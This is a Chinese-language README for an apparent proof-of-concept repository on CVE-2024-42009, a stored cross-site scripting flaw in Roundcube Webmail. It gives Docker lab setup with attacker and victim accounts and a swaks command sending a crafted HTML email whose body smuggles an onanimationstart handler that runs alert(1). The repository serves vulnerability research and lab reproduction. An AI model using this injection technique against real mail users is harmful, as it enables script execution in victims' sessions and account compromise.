该仓库演示了针对 CVE-2024-42009 的有效概念验证(PoC),这是 Roundcube Webmail 中的一个存储型跨站脚本(XSS)漏洞。
该漏洞由不正确的 HTML 净化以及随后不安全地重新处理属性导致,攻击者可通过构造的 HTML 邮件注入恶意事件处理程序。
Roundcube 会净化收到的 HTML 邮件,但随后会重新处理某些属性(例如 bgcolor、畸形属性),导致:
onanimationstart)当受害者打开恶意邮件时,可执行任意 JavaScript。
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ 等待约 10–15 秒,让邮件服务器完成初始化。
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
凭据:
使用 swaks 工具发送恶意邮件:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


升级至修复版本:
本项目仅供教育和授权的安全研究使用。 未经适当许可,请勿用于任何系统。